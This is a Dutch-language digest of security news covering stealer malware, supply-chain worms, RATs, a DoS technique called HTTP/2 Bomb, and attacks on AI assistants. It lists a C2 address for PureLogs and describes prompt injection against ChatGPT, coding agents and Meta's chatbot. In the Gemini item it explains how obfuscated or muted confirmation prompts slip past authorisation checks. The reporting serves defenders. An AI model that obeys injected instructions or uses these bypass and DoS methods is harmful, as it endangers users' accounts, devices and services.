De taak van deze downloader is om een verbinding tot stand te brengen met een externe C2-server op 77.83.39.211 via poort 8443 voor het verzenden van webverzoeken. Dit leidt tot het ophalen van de uiteindelijke payload. Eerst wordt een HTTP GET-verzoek naar het "/ping"-endpoint gestuurd om te bevestigen dat de server actief is, gevolgd door een HTTP POST-verzoek naar het "/plugin"-endpoint om een fileless variant van PureLogs genaamd "zgSGkYYzqVe.dll" te downloaden. Door de uitvoering in het geheugen van deze plugin blijven er geen sporen achter op de fysieke harde schijf.

De PureLogs malware begint vervolgens met het stelen van gevoelige gegevens, gericht op een breed scala aan browsers, cryptocurrency wallets en applicaties. Het steelt opgeslagen inloggegevens, geschiedenis en cookies van Chrome, Firefox, Brave, Vivaldi en Microsoft Edge. Daarnaast richt het zich op bestanden van crypto wallets, privésleutels en transactiegeschiedenissen van Bitcoin Core, Dogecoin Core, Litecoin Core, Exodus en Atomic Wallet.

Bovendien bemachtigt de malware Discord-authenticatietokens en accountwachtwoorden van Outlook, FileZilla, ProtonVPN en OpenVPN. De laatste stap is het bundelen van de gestolen gegevens met een JPEG-screenshot van het bureaublad, systeem informatie, klembord gegevens en de gebruikersnaam. Dit datapakket wordt geserialiseerd, gecomprimeerd met GZip en versleuteld met een AES-sleutel. De versleutelde bundel wordt vervolgens via HTTP POST-verzoeken naar de "/browser" en "/discord"-endpoints naar de server van de aanvallers verzonden.

De beveiligingsfilters van FortiMail hebben deze phishing-e-mails onderschept en de onderwerpregel gemarkeerd als "virus detected", waardoor de kwaadaardige bestanden de inboxen van gebruikers niet konden bereiken. Om de risico's van deze ontwijkende campagne te beperken, adviseren onderzoekers organisaties om strikte e-mailfiltering toe te passen, onnodige scriptuitvoering uit te schakelen en actief te monitoren op afwijkende PowerShell-activiteit en process hollowing.

Diverse cybersecurity experts hebben hun inzichten gedeeld. Jason Soroko, Senior Fellow bij Sectigo, benadrukte dat de campagne aantoont hoe dreigingsactoren zich succesvol verbergen binnen normale zakelijke activiteiten en tools voor systeembeheer, waarbij process hollowing wordt gebruikt om een .NET downloader in een vertrouwde Windows MSBuild executable te injecteren. Kern Smith, Senior Vice President van Global Solutions Engineering bij Zimperium, waarschuwde dat beveiligingsteams verder moeten kijken dan de zichtbaarheid van endpoints en verdachte activiteiten vroegtijdig moeten kunnen identificeren en correleren over mobiele apparaten, applicaties en endpoints. Maxime Cartier, Vice President of Human Risk bij Hoxhunt, legde uit dat het menselijke element een primaire barrière blijft, aangezien de aanvalsketen volledig afhangt van het openen van een kwaadaardige bijlage, wat de noodzaak van een gedragsmatige benadering van beveiligingsrisico's onderstreept.

Bron: FortiGuard Labs

Hackers misbruiken steeds vaker vertrouwde kunstmatige intelligentie (AI)-platforms zoals ChatGPT en Claude om gebruikers aan te vallen. Recentelijk werd een kwetsbaarheid genaamd ClaudeBleed ontdekt, die ongeautoriseerde browser-extensies in staat stelde de interface van Anthropic Claude te kapen. Nu maken aanvallers misbruik van de officiële functionaliteiten van deze AI tools om malware te verspreiden en tegelijkertijd webfilters en beveiligingscontroles te omzeilen.

Beveiligingsonderzoek van Push Security onthult een campagne genaamd LLMShare, die gebruikmaakt van zogenaamde InstallFix-aanvallen. Deze aanvallen, een variant van de ClickFix-familie, exploiteren het feit dat AI tools de installatie via de commandoregel hebben genormaliseerd, zelfs voor gebruikers die onvoldoende ervaring hebben om legitieme terminalcommando's van kwaadaardige te onderscheiden. Hackers gebruikten de functionaliteit voor het renderen van code van ChatGPT om een valse storingsmelding te creëren binnen een echte link. Deze pagina beweerde dat de webversie tijdelijk niet beschikbaar was en drong er bij gebruikers op aan een desktopapplicatie te downloaden, waarna zij werden omgeleid naar een website die leek op de originele: openew.app.

Deze downloadwebsite was slim ontworpen om kwaadaardige uitvoerbare bestanden te leveren, ontwikkeld voor zowel Windows als macOS. Op Mac-apparaten werd de payload geïdentificeerd als Odyssey Stealer, een variant van Atomic macOS Stealer die zich richt op in browsers opgeslagen wachtwoorden, cryptowallets en sessietokens. De downloadwebsite maakte gebruik van een techniek voor conditionele weergave om detectie van malware te voorkomen. Wanneer geautomatiseerde scanners, zoals URLScan, de link controleerden, maskeerde de website zichzelf door een onschadelijke website van een virtual reality-bedrijf te tonen, terwijl echte gebruikers de malwareval zagen.

Een andere kwetsbaarheid, genaamd ChatGPhish, werd ontdekt en gerapporteerd door Permiso Security. Deze kwetsbaarheid richt zich op de manier waarop ChatGPT Markdown-inhoud verwerkt bij het samenvatten van websites van derden. Onderzoekers merkten op dat een aanvaller kwaadaardige code in een gewone webpagina kan injecteren. Wanneer een gebruiker ChatGPT vervolgens vraagt die pagina samen te vatten, haalt de AI automatisch de live, klikbare phishinglinks, QR-codes of valse beveiligingswaarschuwingen van de aanvaller rechtstreeks in de vertrouwde chatinterface. Dit is geen kwetsbaarheid van de browser, maar een probleem waarbij door aanvallers gecontroleerde inhoud wordt weergegeven als vertrouwde gebruikersinterface binnen de LLM-ervaring.

Daarnaast rapporteerde Adversa AI twee kritieke technieken gericht op ontwikkelaars: SymJack en TrustFall. SymJack is een aanval die AI-codeerassistenten misleidt tot een ogenschijnlijk onschuldige bestandskopie die hun eigen configuratiebestanden overschrijft, leidend tot uitvoering van code op afstand. TrustFall is een methode die kwaadaardige software-opslagplaatsen gebruikt om gevaarlijke commando's automatisch goed te keuren via het Model Context Protocol (MCP) zonder gebruikersakkoord.

Deze campagnes voor het stelen van informatie hebben gevaarlijke reële gevolgen. Het IBM X-Force 2026 Threat Intelligence Index-rapport toonde aan dat meer dan 300.000 ChatGPT-inloggegevens al zijn gelekt op het darkweb.

Bron: permiso.io | Bron 2: adversa.ai

Beveiligingsteams worden geconfronteerd met een tweeledig probleem op het gebied van kunstmatige intelligentie (AI). Aan de ene kant gebruiken aanvallers AI om phishingkits te verbeteren, overtuigende lokmiddelen te genereren en hun infrastructuur sneller te wisselen dan traditionele blokkeerlijsten kunnen bijhouden. Aan de andere kant omarmen werknemers AI tools in hoog tempo, vaak zonder adequate beveiligingscontroles. Dit leidt ertoe dat gevoelige gegevens in Large Language Models (LLM's) worden geplakt, OAuth-rechten worden verleend aan AI-agents, en ongecontroleerde AI-browser-extensies worden geïnstalleerd. Beide problemen manifesteren zich primair in de browser, wat deze tot een cruciale frontlinie maakt voor moderne cyberbeveiliging.

Volgens onderzoek van Push Security versnelt AI de ontwikkeling van aanvallershulpmiddelen. Phishing-as-a-Service (PhaaS) tools en kits worden sneller gecreëerd en geüpdatet. Een voorbeeld hiervan is de snelle evolutie van ClickFix, dat nieuwe technieken zoals InstallFix en ConsentFix introduceert. Een andere zorgwekkende ontwikkeling is 'device code phishing', een methode die misbruik maakt van legitieme OAuth-stromen om Multi-Factor Authenticatie (MFA) en passkeys volledig te omzeilen. Deze techniek is in 2026 geëxplodeerd, waarbij het aantal actieve kits met een factor 18 is toegenomen en detecties 37 keer vaker voorkomen. Cybercrimegroepen zoals ShinyHunters en BlackFile maken uitgebreid gebruik van dergelijke kits, waaronder Doko's Panel en afgeleide varianten, waarin zwaar AI-gebruik is waargenomen. Overvloedige commentaren in de paginacode worden gezien als een duidelijke indicator van ontwikkeling met assistentie van AI.

De effectiviteit van detecties gebaseerd op Indicators of Compromise (IoC's) neemt af. AI verlaagt de kosten voor het opzetten van overtuigende phishing-infrastructuur aanzienlijk. Een geloofwaardige phishingpagina kan binnen enkele minuten worden 'vibecoded', geïmplementeerd op een nieuw domein, slachtoffers maken en weer worden verwijderd voordat reputatiediensten deze kunnen markeren. Spamhaus rapporteert dat 89% van de phishingdomeinen minder dan twee dagen actief is. Voor organisaties die vertrouwen op blokkeerlijsten en IoC-feeds, is elke phishingaanval effectief een zero-day. Bovendien wordt misbruik gemaakt van legitieme sites voor het hosten en leveren van phishinglinks, zoals te zien is bij de LLMShare-campagne, die legitieme chatgpt.com-sharinglinks gebruikt voor malvertising via zoekmachineadvertenties die extreem moeilijk te herkennen zijn.

AI maakt het ook eenvoudiger om campagnes via meerdere kanalen op te zetten. Gegevens van Push Security tonen aan dat ongeveer 1 op de 3 phishing-payloads via andere kanalen dan e-mail arriveert, zoals malvertising, sociale media en SEO-poisoning. Bij ClickFix-campagnes komt zelfs 4 op de 5 payloads specifiek via resultaten van zoekmachines binnen. Beveiliging van e-mail is structureel blind voor deze snelgroeiende leveringskanalen. De browser, waar payloadlevering en overname van accounts daadwerkelijk plaatsvinden, is daarom de laag waar detectie moet opereren, door het analyseren van paginagedrag, scriptuitvoering en kwaadaardige mechanismen zoals sessiediefstal, kopiëren en plakken, en bestanddownloads.

Bron: Push Security

Red Hat heeft maandag tientallen softwarepakketten uit zijn distributiepijplijn verwijderd, nadat aanvallers een gecompromitteerd GitHub-account hadden gebruikt om malware voor het stelen van inloggegevens te verspreiden onder ontwikkelaars. Volgens de voorlopige analyse van het bedrijf werd via het gecompromitteerde GitHub-account kwaadaardige code verspreid naar klanten, waarbij 32 pakketten werden getroffen die wekelijks ongeveer 117.000 keer werden gedownload. Red Hat heeft de getroffen pakketten sindsdien verwijderd en stelt dat "op basis van de huidige bevindingen geen acties van klanten vereist zijn."

De aanval maakte gebruik van een variant van de Mini Shai-Hulud zelfverspreidende worm, waarvan de volledige broncode op 12 mei online werd gepubliceerd door de cybercriminele groep TeamPCP. Zoals cybersecuritybedrijf Tenable opmerkte, kondigden de criminelen "gelijktijdig een wedstrijd van $1.000 aan op BreachForums voor de grootste supply chain aanval met behulp van de code." Of de aanval van maandag werd uitgevoerd door TeamPCP zelf of door een andere actor die de gepubliceerde code gebruikte, kon niet onmiddellijk worden vastgesteld, aldus onderzoekers.

Palo Alto Networks' Unit 42 waarschuwde dat het openbaar maken van de broncode van de worm al tot copycat-activiteiten heeft geleid, waardoor definitieve attributie moeilijker wordt en dat Mini Shai-Hulud "niet langer beperkt is tot TeamPCP." De malware van de aanval, die de auteurs Miasma noemden, verschilde slechts cosmetisch van het origineel van TeamPCP; verwijzingen naar de sciencefictionreeks Dune werden vervangen door Griekse mythologie, terwijl de onderliggende functionaliteit voor het stelen van inloggegevens intact bleef.

De aanval van maandag is de meest recente in een reeks supply chain inbreuken die teruggaan tot september 2025, toen de originele Shai-Hulud worm leidde tot een CISA-advies, en die enkele van 's werelds meest gebruikte ontwikkelaarstools hebben getroffen. Recente incidenten omvatten een aanval in maart op LiteLLM, waardoor cybercriminelen verschillende organisaties konden binnendringen, waaronder AI-recruitmentbedrijf Mercor. De aanval op LiteLLM werd gevolgd door een aparte reeks compromitteringen die werden toegeschreven aan Noord-Koreaanse hackers, gericht op de axios JavaScript-bibliotheek. Die campagne bracht Charles Carmakal, Chief Technology Officer van Mandiant, ertoe te waarschuwen dat "de geheimen die de afgelopen twee weken zijn gestolen, de komende dagen, weken en maanden meer supply chain aanvallen, compromitteringen van Software-as-a-Service omgevingen, ransomware- en afpersingsincidenten, en cryptodieften mogelijk zullen maken."

In mei bevestigde GitHub dat het was gecompromitteerd door TeamPCP nadat een apparaat van een werknemer was gecompromitteerd via een kwaadaardige Visual Studio Code-extensie, waarbij de groep $50.000 eiste voor gestolen broncode en dreigde deze gratis te lekken als er geen koper kwam. OpenAI had ook gewaarschuwd dat twee van zijn werknemersapparaten in dezelfde golf waren gecompromitteerd, na een supply chain aanval op de open source bibliotheek TanStack. Ten tijde van de LiteLLM-compromittering waarschuwde Adam Reynolds, senior security researcher bij Sonatype, dat omdat "de malware een breed scala aan inloggegevens target... dit het potentieel creëert voor tweede- en derderangs effecten die zich in de loop van de tijd kunnen verspreiden, leidend tot verdere inbreuken, serviceonderbrekingen of misbruik van gevoelige gegevens ver buiten het initiële compromitteringspunt."

Bron: Red Hat | Bron 2: tenable.com | Bron 3: unit42.paloaltonetworks.com

Een recente ontdekking wijst op een exploit binnen Instagram die misbruik maakt van de AI-chatbot van Meta. Deze chatbot, die onvoldoende beveiligingsmechanismen zou hebben, wordt ingezet door kwaadwillenden om premium gebruikersnamen te bemachtigen, met name de gewilde 'one-letter' accounts. De methode omvat het misleiden van de AI door het gebruik van verborgen karakters, waarna de chatbot wordt overgehaald om de gewenste wijziging van de gebruikersnaam toe te passen.

De exploit stelt verkopers in staat om via slinkse methoden toegang te krijgen tot unieke en waardevolle Instagram-gebruikersnamen. Door de AI te manipuleren met specifieke, verborgen tekens, kunnen zij de chatbot ertoe bewegen om beheerdersacties uit te voeren en de gewenste gebruikersnaamoverdracht te bewerkstelligen. Monitoringbots hebben reeds waargenomen dat originele, korte gebruikersnamen op deze manier van eigenaar wisselen.

Dit incident benadrukt de risico's die gepaard gaan met de integratie van AI-systemen in platforms waar gevoelige gebruikersgegevens en beheerrechten een rol spelen. Een gebrek aan robuuste 'guardrails' of beveiligingsprotocollen in AI-chatbots kan leiden tot onbedoelde kwetsbaarheden die door kwaadwillende actoren worden uitgebuit. Voor Instagram-gebruikers, inclusief die in Nederland en België, betekent dit een potentieel risico op het verlies van hun unieke accountnamen aan derden. Het incident onderstreept de noodzaak voor Meta om de beveiliging van zijn AI-systemen grondig te herzien en te versterken om dergelijke manipulaties te voorkomen en de integriteit van gebruikersaccounts te waarborgen. De exacte technische details van de gebruikte verborgen karakters en de wijze waarop de AI precies wordt misleid, zijn niet verder gespecificeerd in de melding.

Bron: Cybercrimeinfo

Onderzoekers van Unit 42 hebben een wijdverbreide malvertising campagne gedetecteerd die gericht is op macOS-gebruikers. Deze campagne, genaamd "Operation FlutterBridge", verspreidt de nieuwe FlutterShell backdoor en lijkt een verdere ontwikkeling te zijn van de "JSCoreRunner" campagne die in augustus 2025 voor het eerst werd geïdentificeerd. De financieel gemotiveerde aanvallers achter deze campagnes zijn overgestapt van het leveren van standaard adware naar adware met volledige backdoor functionaliteiten.

FlutterShell, gebouwd met het Flutter framework, infecteert slachtoffers met adware via kwaadaardige desktop applicaties. Naast de adware functionaliteit beschikt de payload over uitgebreide backdoor mogelijkheden, waaronder de uitvoering van shell commando's en manipulatie van bestandssystemen. Sommige varianten misbruiken zelfs functies voor AI samenvattingen voor data exfiltratie, waarbij documenten via een door de aanvaller beheerde server worden gerouteerd voordat ze worden verwerkt. De FlutterShell malware wordt actief doorontwikkeld, waarbij snel nieuwe verbeteringen in de code worden geïntegreerd.

Operation FlutterBridge richt zich op een wereldwijd publiek via een uitgebreide Google Ads campagne, met een sterke nadruk op Engelstalige en West-Europese markten. Honderden door Google geverifieerde advertenties worden hiervoor gebruikt. Onderzoek wijst uit dat de aanvallers achter dit cluster van activiteiten een reeks dekmantelbedrijven inzetten om de controle van advertentienetwerken te omzeilen en deze aanvallen op grote schaal te orkestreren. Unit 42 heeft deze adverteerders gemeld bij Google, dat heeft laten weten de betreffende adverteerdersaccounts te hebben opgeschort wegens schending van hun beleid.

Unit 42 volgt Operation FlutterBridge en de JSCoreRunner campagne onder de clusteractiviteit die zij aanduiden als CL-CRI-1089. Palo Alto Networks klanten worden beschermd tegen de beschreven dreigingen via producten zoals Advanced WildFire, Advanced URL Filtering, Advanced DNS Security, Cortex Agentix Threat Intel Agent, Cortex XDR en XSIAM.

Bron: Unit 42 | Bron 2: github.com | Bron 3: mastodon.social

Cybersecurityonderzoekers hebben details bekendgemaakt van een spear phishing campagne die vermoedelijk is uitgevoerd door de aan Pakistan gelinkte groep SideCopy. De campagne richtte zich op het Afghaanse Ministerie van Financiën met een open source remote access trojan, genaamd Xeno RAT. De activiteiten zijn door Seqrite Labs gedetailleerd beschreven en hebben de codenaam Operation XENOFISCAL gekregen.

De aanval begint met een spear phishing levering, waarbij een ZIP-archief wordt gebruikt dat een kwaadaardig LNK-bestand bevat. Dit bestand is voorzien van een zorgvuldig opgestelde Pashto taal bestandsnaam, wat duidt op een diepgaande kennis van de doelomgeving. Naast het Ministerie van Financiën waren ook provinciale inkomsten- en financiële directies, Pashto sprekende overheidsfunctionarissen en provinciale overheidsmedewerkers doelwit van de campagne.

SideCopy is de naam van een dreigingsgroep die opereert onder de bredere Transparent Tribe (ook bekend als APT36) paraplu. Deze groep staat bekend om het gebruik van diverse malwarefamilies voor het stelen van gevoelige data van gecompromitteerde systemen. Eerder, in april 2025, werd de groep in verband gebracht met aanvallen op verschillende sectoren in India, waarbij Xeno RAT, Spark RAT en CurlBack RAT werden ingezet. De huidige campagne is een voortzetting van deze bredere reeks kwaadaardige cyberactiviteiten gericht op entiteiten in Zuid-Azië.

Na uitvoering misbruikt het Windows Shortcut (LNK) bestand "mshta.exe" om een HTML Application (HTA) op te halen van een gecompromitteerd Afghaans onderwijsdomein. Dit leidt tot de uitvoering van geobfusceerde JavaScript code in het geheugen. De malware creëert ook register gebaseerde persistentie door Microsoft Edge te imiteren, terwijl het Xeno RAT 1.8.7 en een afleidingsdocument dropt via een op DLL gebaseerde loader.

Xeno RAT is ontworpen om via TCP verbinding te maken met een externe server en commando's van de operator te ontvangen. De malware kan externe DLL-modules laden en uitvoeren, data naar de server verzenden, zichzelf starten via een geplande taak, antivirusinformatie ophalen, SOCKS5 proxy gebaseerde netwerk tunneling ondersteunen, bestandsoperaties uitvoeren, toetsaanslagen loggen, schermafbeeldingen maken, het klembord monitoren, webcam en microfoon volgen, persistentiemethoden verwijderen en zichzelf de-installeren.

Deze onthulling valt samen met het verschijnen van details over een gerichte phishing operatie die gebruikmaakt van geprepareerde Linux .desktop bestanden. Deze operatie richtte zich op de Indiase militaire infrastructuur met lokmiddelen gerelateerd aan contracten voor de aanschaf van Indiase gepantserde voertuigen. Deze campagne wordt eveneens toegeschreven aan Transparent Tribe. Een rapport van beveiligingsonderzoeker R.D. Tarun van vorige maand beschrijft hoe deze campagne zich richt op individuen die verbonden zijn met de Indiase militaire en defensie-infrastructuur via WhatsApp gebaseerde social engineering en een gefaseerde shell payload levering. Na uitvoering initieert de kwaadaardige .desktop launcher een zwaar geobfusceerde, op shell gebaseerde infectieketen, inclusief gefaseerde payload retrieval, inline decodering routines en de implementatie van een op Golang gebaseerde ELF-implantaat, genaamd DeskRAT.

Bron: Seqrite Labs

CISA, de FBI, de NSA, het Amerikaanse Ministerie van Energie en andere Amerikaanse overheidsinstanties waarschuwen voor cyberaanvallen gericht op via internet toegankelijke automatische tankmeetinstrumenten (ATG-systemen). Deze systemen worden gebruikt voor het monitoren van brandstof- en vloeistofopslagtanks in diverse vitale infrastructuursectoren. Het cybersecurity-agentschap stelt dat ATG-systemen veelvuldig worden toegepast in de energie-, chemische, voedsel- en landbouw- en transportsystemensector om op afstand opslagtankniveaus, temperaturen en potentiële lekken te bewaken.

Volgens de Amerikaanse overheid richten dreigingsactoren zich op blootgestelde apparaten en wijzigen zij systeeminstellingen door het uitvoeren van commando's. De waarschuwing, die de Amerikaanse overheid nog niet heeft toegeschreven aan een specifieke staat of dreigingsgroep, beschrijft hoe cyberdreigingsactoren via internet toegankelijke ATG-systemen compromitteren en deze vervolgens aanpassen door commando's uit te voeren.

Aanvallers verkrijgen toegang door misbruik te maken van kwetsbaarheden die authenticatie omzeilen, vastgelegde inloggegevens, fouten in de uitvoering van commando's van het besturingssysteem, SQL-injectie kwetsbaarheden en zwakheden in privilege-escalatie. Indien een systeem succesvol wordt gecompromitteerd, kunnen de aanvallers netwerkinstellingen, productidentificatoren, tankvolumes en pompbediening wijzigen. Ze kunnen ook waarschuwingen uitschakelen en omstandigheden creëren die voorkomen dat operators de tankvulniveaus correct monitoren, wat het risico op lekken of storingen van apparatuur potentieel verhoogt.

De instanties dringen er bij organisaties op aan om ATG-systemen af te schermen van het internet, toegang op afstand te beperken via firewalls, VPN's of toegangscontrolelijsten, standaardwachtwoorden te vervangen, sterke inloggegevens en meervoudige authenticatie te gebruiken, beveiligingsupdates toe te passen en systemen actief te monitoren op ongeautoriseerde wijzigingen.

Hoewel de waarschuwing de activiteit niet toeschrijft aan een specifieke dreigingsactor, volgt deze op een rapportage van CNN in mei, waarin werd gemeld dat Iraanse hackers verantwoordelijk waren voor een reeks inbraken waarbij ATG-systemen bij benzinestations in meerdere Amerikaanse staten betrokken waren. Volgens CNN exploiteerden de aanvallers ATG-systemen die met het internet waren verbonden en beschermd werden door zwakke of ontbrekende wachtwoorden, waardoor zij toegang kregen tot weergaven en deze konden manipuleren. De aanvallers wijzigden echter niet de werkelijke brandstofniveaus. De incidenten veroorzaakten naar verluidt geen fysieke schade, maar wekten bezorgdheid dat aanvallers potentieel kunnen interfereren met lekdetectie en andere veiligheidsgerelateerde functies. CNN meldde dat Iran de primaire verdachte was vanwege hun geschiedenis van het aanvallen van brandstofbeheersystemen en andere industriële controlesystemen. Desondanks stelden meerdere bronnen die op de hoogte waren van het onderzoek, volgens CNN, dat het mogelijk niet lukt om de activiteit toe te schrijven aan een specifieke aanvaller, omdat er beperkt forensisch bewijs is achtergelaten bij de aanvallen. CISA en haar partners adviseren organisaties die ATG-systemen beheren om hun blootstelling te evalueren en de aanbevolen mitigaties onmiddellijk te implementeren om het risico op compromittering te verminderen.

Bron: CISA | Bron 2: ic3.gov | Bron 3: cnn.com

Onderzoekers van SafeBreach hebben een aanvalstechniek ontdekt waarmee de voice assistent Google Gemini op Android-apparaten gekaapt kan worden door middel van een enkele kwaadaardige notificatie. Deze notificaties kunnen afkomstig zijn van populaire apps zoals WhatsApp, Slack, sms, Signal, Instagram of Messenger. Een kwaadaardige app op het apparaat is niet vereist; Gemini hoeft de vijandige notificatie alleen als bruikbare context te interpreteren.

De ontdekking, gepubliceerd door Or Yair van SafeBreach, bouwt voort op eerder onderzoek naar 'Invitation Is All You Need'-aanvallen, die vergelijkbare trucs uitvoerden via kwaadaardige Google Agenda-uitnodigingen. Hoewel Google Gemini na dat eerdere werk had versterkt tegen indirecte prompt injectie, vond Yair een manier om deze nieuwe verdedigingsmechanismen te omzeilen. Google heeft de kwetsbaarheid inmiddels gepatcht. SafeBreach heeft geen CVE-nummer voor dit probleem vermeld en er is geen bewijs dat de techniek ooit in de praktijk is gebruikt.

De aanval is specifiek voor Android, omdat Gemini's 'Utilities'-functie daar notificaties kan lezen en beantwoorden. De agent die deze notificaties leest, behandelt hun tekst als instructies. Elk mechanisme dat een notificatie naar een telefoon kan sturen, kan zo een payload leveren, een aanvalsoppervlak dat Yair als "effectief oneindig" omschreef.

De impact van de aanval is breed. Aanvallers kunnen de output van Gemini herschrijven, inclusief het faken van berichten van contactpersonen. Zo kan een gesproken bericht als "uw manager vroeg u om de documenten naar deze Drive map te uploaden" moeilijk te onderscheiden zijn van een legitiem verzoek. De methode kan ook worden gebruikt om fysieke acties te initiëren, zoals het openen van een venster of het starten van een app, acties die Google's eerdere mitigaties moesten voorkomen. Verdere gevolgen omvatten smart home controle via Google Home (ramen, boilers, verlichting), tracking en downloads via URL's, en het geforceerd laten deelnemen aan Zoom-vergaderingen. De techniek maakt zelfs geheugenvergiftiging mogelijk, waarbij Gemini een door de aanvaller gekozen feit permanent opslaat op account-niveau, en persistentie via geplande acties.

Om Google's nieuwe verdedigingsmechanismen te omzeilen, ontwikkelde Yair de 'Fake Context Alignment'-techniek. Deze techniek creëert twee illusies tegelijkertijd: een legitiem ogende autorisatie voor de beveiligingscheck van Google en een onschuldige uitwisseling voor de gebruiker. Dit wordt bereikt via 'versluiering' (Obfuscated) en 'demping' (Muted):

*   **Versluierd:** Gemini stelt de echte autorisatievraag in een onbegrijpelijke taal (bijvoorbeeld Chinees), gevolgd door een onschuldige Engelse vraag. De gebruiker zegt "Ja" op de Engelse vraag, en de backend koppelt die "Ja" aan de verborgen autorisatie.

*   **Gedempt:** De kwaadaardige vraag wordt verborgen in een hyperlink die de tekst-naar-spraak functie van Gemini overslaat. De assistent spreekt een generieke foutmelding uit, terwijl op het scherm de autorisatievraag wordt getoond. De gebruiker zegt "Ja", en de on-screen tekst wordt verwerkt.

De combinatie van deze methoden stelt aanvallers in staat om Google's controles te passeren terwijl voor de gebruiker een normale uitwisseling klinkt.

SafeBreach rapporteerde de bevindingen op 17 augustus 2025 aan Google, die de kwetsbaarheid als hoge prioriteit behandelde. Google bevestigde op 14 november 2025 dat verbeteringen aan de content classifier de notificatie-injecties en de 'Delayed Tool Invocation' bypass hadden gemitigeerd. Omdat de oplossing server-side is, is geen app-update nodig. Gebruikers kunnen uit voorzorg de 'Utilities' app ontkoppelen in Gemini's 'Connected Apps' instellingen, of de 'Notification read, reply & control' permissie van de Google app op Android uitschakelen.

Bron: SafeBreach | Bron 2: blog.google

Een recent ontdekte denial-of-service (DoS) aanval, genaamd 'HTTP/2 Bomb', is in staat om veelgebruikte webservers binnen enkele seconden ontoegankelijk te maken. Deze aanval kan worden uitgevoerd vanaf één enkele machine en misbruikt standaard HTTP/2-configuraties van prominente webserversoftware, waaronder NGINX, Apache HTTP Server, Microsoft IIS, Envoy en Cloudflare Pingora.

De ontdekking werd gedaan door de Codex software agent van OpenAI, onder begeleiding van onderzoekers van het offensieve beveiligingsbedrijf Calif. De 'HTTP/2 Bomb' combineert twee eerder bekende HTTP/2 DoS-methoden: de HPACK-compressie-amplificatie en de Slowloris-stijl resource-retentie via HTTP/2 flow-control stalling. De combinatie van deze technieken heeft een aanzienlijke impact.

Onderzoekers van Calif benadrukken dat een enkele cliënt met een 100 Mbps internetverbinding binnen seconden tientallen gigabytes aan RAM van een kwetsbare server kan uitputten. Dit dwingt de server om geheugen toe te wijzen en voorkomt vervolgens dat dit geheugen weer wordt vrijgegeven. In tests met Apache httpd en Envoy kon een enkele cliënt in ongeveer twintig seconden 32 GB aan servergeheugen verbruiken en vasthouden.

De aanval misbruikt het HPACK-mechanisme van het HTTP/2-protocol, dat wordt gebruikt voor header-compressie. Een aanvaller voegt een header toe aan de dynamische HPACK-tabel en refereert deze vervolgens herhaaldelijk via een compacte geïndexeerde representatie van slechts één byte groot. Het gevolg hiervan is dat een enkele byte die door de aanvaller wordt verzonden, kan resulteren in duizenden bytes aan server-side geheugenallocatie. Envoy en Apache httpd lieten de slechtste ratio's zien, met respectievelijk 5.700:1 en 4.000:1.

Het tweede deel van de aanval richt zich op het voorkomen dat het toegewezen geheugen wordt vrijgegeven nadat een verzoek is voltooid. Dit wordt bereikt door een zero-byte flow-control window te adverteren. In plaats van een volledige respons te versturen, stuurt de server periodiek kleine WINDOW_UPDATE frames om timeouts te vermijden. Hierdoor worden de verzoeken nooit volledig afgerond en blijft het toegewezen geheugen groeien zonder te worden vrijgegeven. Deze methode omzeilt bestaande beveiligingsmaatregelen, zoals limieten op de totale gedecodeerde headergrootte, omdat de headerwaarden die in de aanval worden gebruikt klein zijn en de amplificatie voortkomt uit interne boekhouding en geheugenallocaties per header.

Tests met de nieuwe DoS-aanvalstechniek tegen vier belangrijke webservers leverden de volgende resultaten op:

*   Envoy 1.37.2 putte 32 GB RAM uit in ongeveer 10 seconden.

*   Apache httpd 2.4.67 putte 32 GB RAM uit in ongeveer 18 seconden.

*   nginx 1.29.7 putte 32 GB RAM uit in ongeveer 45 seconden.

*   Microsoft IIS (Windows Server 2025) putte 64 GB RAM uit in ongeveer 45 seconden.

De volledige technische details van de 'HTTP/2 Bomb' DoS-aanval zullen later deze maand worden gepresenteerd door onderzoeker Quang Luong op de Real World AI Security-conferentie. Proof-of-concept (PoC) exploits voor deze nieuwe aanvalsmethode zijn echter reeds gepubliceerd.

Niet alle webservers zijn kwetsbaar voor de 'HTTP/2 Bomb'. Voor sommige platforms zijn al patches uitgebracht. Bovendien kunnen bepaalde aangepaste serverconfiguraties indirecte bescherming bieden. Systemen die achter Content Delivery Networks (CDN's) of reverse proxies draaien, bijvoorbeeld, stellen het kwetsbare HTTP/2-eindpunt niet direct bloot en zijn moeilijker te targeten. Ook kunnen sommige implementaties al beschikken over aangepaste header-count limieten, Web Application Firewalls (WAF's), reverse proxies, of hebben zij HTTP/2 uitgeschakeld.

Het probleem is opgelost in nginx versie 1.29.8 door de introductie van een 'max_headers' directive. Voor Apache httpd mod_http2 2.0.41 is het probleem geïdentificeerd als CVE-2026-49975 en ook hiervoor is een fix beschikbaar. Ten tijde van de publicatie is er nog geen patch beschikbaar voor IIS, Envoy of Pingora. Voor deze webservers wordt aanbevolen om HTTP/2 uit te schakelen waar dit haalbaar is, en een proxy of firewall ervoor te plaatsen die strikte header-count limieten afdwingt.

Bron: Calif | Bron 2: github.com | Bron 3: hubs.li

Cybersecurityonderzoekers hebben een nieuwe malspam campagne geïdentificeerd die misbruik maakt van het DoubleClick-domein van Google om detectie te omzeilen en uiteindelijk de DesckVB RAT, een remote access trojan, te verspreiden. Volgens een rapport van Huntress-onderzoekers Anna Pham en Adam Mooney, gedeeld met The Hacker News, wordt de lokker door DoubleClick geleid voordat het slachtoffer de door de aanvallers beheerde infrastructuur bereikt. Dit is opmerkelijk omdat DoubleClick een legitiem, door Google beheerd domein is dat door veel beveiligingstools minder snel als verdacht wordt aangemerkt.

Vanaf DoubleClick wordt het slachtoffer doorgestuurd naar een malspam kit die zichzelf dynamisch aanpast met het e-mailadres van het slachtoffer. Deze kit haalt bedrijfsbranding en locatiegegevens op, waardoor de landingspagina overtuigend lijkt zonder dat de operators voor elk doelwit handmatig een lokker hoeven te maken. Dit maakt de operaties schaalbaarder en kosteneffectiever, omdat er geen op maat gemaakte kit nodig is voor elke gerichte organisatie. Het uiteindelijke doel van de campagne is het installeren van DesckVB RAT, een trojan gebaseerd op .NET die sinds februari 2026 actief is.

De aanval begint wanneer een onoplettende gebruiker een HTML-bestand opent dat is bijgevoegd bij een phishing-e-mail. Dit bestand activeert een meta-refresh browseromleiding naar een DoubleClick Campaign Manager URL voor klikregistratie. Vanaf daar wordt de gebruiker naar een andere redirector geleid, die het Base64-gecodeerde e-mailadres decodeert en het slachtoffer naar een landingspagina stuurt met een "Download PDF"-knop. Door op deze knop te klikken, reageert de server met een ZIP-archief dat de rest van de infectieketen initieert.

